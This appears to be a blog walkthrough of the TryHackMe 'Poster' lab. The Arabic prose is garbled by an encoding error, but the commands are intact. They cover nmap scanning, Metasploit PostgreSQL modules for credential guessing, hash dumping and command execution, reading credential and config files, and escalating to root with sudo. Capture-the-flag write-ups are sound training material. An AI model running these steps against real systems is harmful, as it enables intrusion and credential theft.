TryHackMe|Poster WriteUp\Walkthrough (Arabic)
ุจุณู ุงููู
ุงููู ูุจุบู ูุดูู ุงูุญู ู ุดุฑูุญ ููุฏูู ูุฑุฌุน ููููุฏูู ุนูู ููุงุชู ุจุงูููุชููุจ ุนูู ูุฐุง ุงูุฑุงุจุท:
ุฑุงุจุท ุงูุชุญุฏู: https://tryhackme.com/r/room/poster
====================================================
ููู ุฉ IP ูู ูู ุงูููู ุงูุฏุฒ ุงููู ุฃูุชุจูุง ุชُุณุชุจุฏู ุจุงููIP ููู ุดูู ุญูุชูู ุนูู TryHackMe
ุฃูู ุญุงุฌุฉ ูุดุบู ุงููmachine ููุชุฃูุฏ ุฅููุง ุงุชุตููุง ุจุดุจูุฉ TryHackMe ูุงูุงุชุตุงู ู ุถุจูุท، ุจุนุฏูู ูุจุฏุฃ ุจุฃูู ุฎุทูุฉ ููุญู ููู ุฅููุง ูุณูู scan ููุดุจูุฉ ุจุงุณุชุฎุฏุงู nmap
sudo nmap IP -vv
ุทูุน ู ุนุงูุง 3 ุจูุฑุชุงุช 22 ู 80 ู 5432
ุฃูู ูุซุงูู ุณุคุงู ุณุฃู ุนู ุงุณู ุงููRDBMS ูุนูู ุฃู ุจูุฑุช؟ ุงูุจูุฑุช ูู 5432 ูุงุณู ูุธุงู ูุงุนุฏุฉ ุงูุจูุงูุงุช ูู postgresql
ุจุนุฏ ูุฐุง ุจูุจุฏุฃ ูุดุชุบู ุจุงุณุชุฎุฏุงู Metasploit ููุฌู ุน ุงูู ุนููู ุงุช ุงููู ูุจุบุงูุง، ุฃูู ุดูุก ูุดุบู Metasploit
msfconsole -q
ุจู ุง ุฅููุง ูุจุบู ูุฌู ุน ู ุนููู ุงุช ูุฑุญ ูุจุญุซ ุนู auxiliary ุชุตูุฑ ุงูููู ุงูุฏ
search postgre type:auxiliary
ุจูุณุชุฎุฏู ุฑูู 4، ุซู ูุนุฏู ุนูู ุงููoptions
setg rhosts IP
ููุง ุงุณุชุฎุฏู ุช setg ุนุดุงู ูุตูุฑ ูู ู ุฑุฉ ูุณุชุฎุฏู module ุฌุฏูุฏุฉ ูุญุท ูุฐู ุงูููู ุฉ ุจุฏูู ู ุง ุฃุฏุฎููุง ุฃูุง ูู ู ุฑุฉ
set verbose false
run
ูู ุง ูุดุบููุง ุจูุนุทููู ุงุณู ุงูู ุณุชุฎุฏู postgres ูููู ุฉ ุงูุณุฑ ูู. ุจูุฐุง ูููู ุฌุงูุจูุง ุนูู ุฑุงุจุน ูุฎุงู ุณ ุณุคุงู
ุจุนุฏ ูุฐุง ูุจุบู ุงููversion ูุดุบู ููุณ ุงูููู ุงูุฏ ุงููู ุจุงูุฃุนูู search postgre type:auxiliary، ุซู ูุฎุชุงุฑ 6
use 6
setg password *******
run
ุซู ุจูุทุจุน ููุง ุงููversion
ูุจูุฐุง ุฌุงูุจูุง ุนูู ุงูุณุคุงููู ุงููู ุจุนุฏูุง
ุจุนุฏ ูุฐุง ูุจุบู ุงููhashes ูุดุบู ููุณ ุงูููู ุงูุฏ ุงููู ุจุงูุฃุนูู search postgre type:auxiliary، ุซู ูุฎุชุงุฑ 8
use 8
run
ููุฐู ุฅุฌุงุจุฉ ุงูุณุคุงููู 8 ู 9
ุจุนุฏ ูุฐุง ูุจุบู ุงููmodule ุงููู ุชุณุงุนุฏูู ุนูู ูุฑุงุกุฉ ุงูู ููุงุช ู ู ุงูุณูุฑููุฑ، ูุดุบู ููุณ ุงูููู ุงูุฏ ุงููู ุจุงูุฃุนูู search postgre type:auxiliary، ููู ุจุชููู ุฑูู 5
ุจุนุฏูุง ุณุฃู ุนู ุงููmodule ุงููู ุชุณู ุญ ุจุชูููุฐ ููู ุงูุฏุฒ ุนูู ุงูุณูุฑููุฑ، ูุฐู ูุฃููุง ู ู ุจุณ ุชุฌู ุน ุจูุงูุงุช، ุจู ุชุนุทู ูุตูู ููุณูุฑููุฑุชููู ู ู ููุน exploit، ูุฐูู ุจูุจุญุซ search postgre type:exploit
ูุณุชุฎุฏู ุฑูู 2
ููุง ุฅุฌุงุจุฉ ุงูุณุคุงููู 10 ู 11
ูุฑุฌุน ูููmodule، ูุนุฏู ุนูู ุงููoptions ุงููู ุชุญุชุงุฌ ุชุนุฏูู
set lhost tun0
tun0 ุชُุดูุฑ ุฅูู ุนููุงู OpenVPN ุนูู ุงูุฌูุงุฒ
set rhosts IP
set password *****
run
ุจูุญุตู ุนูู command shell، ูุถุบุท ู ู ุงูููุจูุฑุฏ ุนูู ctrl + z ุนูุดุงู ูุญุทูุง ุจุงูุฎูููุฉ، ุซู ูุฑูู ูุฐู ุงููshell ุฅูู meterpreter
sessions -u 1
ุจุนุฏ ู ุง ูุญุตู ุนูู ุงููmeterpreter، ูุฑูุญ ููุง seesions 2 ุซู ูุฑูุญ ูููhome ููุดูู ุฅุฐุง ููููุง ุฃู ููุงู
cd /home
ls
cd dark
ls
ููุง ุนูุฏูุง ู ูู ุงุณู ู credentials.txt، ูุฅุฐุง ุงุณุชุนุฑุถูุงู cat credentials.txt ุจูููู ุงุณู ุงูู ุณุชุฎุฏู ูููู ุฉ ุงูุณุฑ ููู ุณุชุฎุฏู dark.
cd ../alison
ls
ูุจูููู ุจุฏุงุฎู ู ุฌูุฏ ุฃููุณูู ุงูููุฒุฑ ููุงู، ููู ู ุง ููุฏุฑ ููุฑุฃู ูุฃู ู ุง ุนูุฏูุง ุตูุงุญูุงุช ูุงููุฉ. ุงูุญูู ุจูุฏุฎู ุนูู ุงููุธุงู ุจุงุณุชุฎุฏุงู SSH ููdark
ssh dark@IP
ุซู ูุฏุฎู ููู ุฉ ุงูุณุฑ، ุซู ูุณูู spawn ููbash shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ุงูุญูู ุจูุจุญุซ ุนู ุฃู ู ูู ุซุงูู ุชู ููู ุฃููุณูู، ู ู ูู ูููู ููู ู ูู ููุฏุฑ ูุณุชุบูู ูู ู ุฎูุงูู ููุตู ูุตูุงุญูุงุช ููุฏุฑ ู ู ุฎูุงููุง ููุฑุฃ ุงูููุฒุฑ ููุงู
find / -user alison
ุทูุน ู ุฌู ูุนุฉ ูุจูุฑ ู ู ุงูู ููุงุช، ูุฃุญุฏูุง ูู config.php
ุจุงูุนุงุฏุฉ ู ููุงุช ุงููconf ูููู ุจุฏุงุฎููุง ู ุนููู ุงุช ู ููุฏุฉ، ู ููุง ุงุณู ู ุณุชุฎุฏู ูููู ุฉ ู ุฑูุฑ ู ุซูุง، ูุณุชุนุฑุถ ุงูู ูู
cat /var/www/html/config.php
ูุจูููู ุจุฏุงุฎูู ููู ุฉ ุณุฑ ุฃููุณูู
su alison
ุจุนุฏ ู ุง ูุนุทูู ููู ุฉ ุงูู ุฑูุฑ، ุจูุตูุฑ alison، ูุฑูุญ ููู ุฌูุฏ ุงูุฑุฆูุณู ููุง ูููุฑุฃ ุงูููุงู
cd /home/alison
cat user.txt
ุงูุญูู ูุจู ููุฑุฃ ุขุฎุฑ ููุงู ูุงููู ุนุงุฏุฉ ูููู ูู ุงููroot home directory، ููุญุชุงุฌ ูุฑูุน ุตูุงุญูุงุชูุง، ุจูุจุญุซ ููุดูู ุงูุด ุงูููู ุงูุฏุฒ ุงููู ุชูุฏุฑ ุฃููุณูู ุชููุฐูุง ูุฑููุช ุจุฏูู ุงุณุชุฎุฏุงู ููู ุฉ ุณุฑ
sudo -l
ุทูุน ููุง ุฅู ุฃููุณูู ู ู ูู ุชููุฐ ุฃู ููู ุงูุฏ ุนูู ุงููุธุงู ุจุฏูู ุฃู ููู ุฉ ุณุฑ، ุฅุฐู ุจูู ุณูููุฉ
sudo su
cd /root
cat root.txt
ูุจูุฐุง ูููู ุญุตููุง ุนูู ุขุฎุฑ ููุงู ูุงูุชูููุง ู ู ุงูุญู، ุจุงูุชูููููู ููู ๐๐ป๐.












Comments
Post a Comment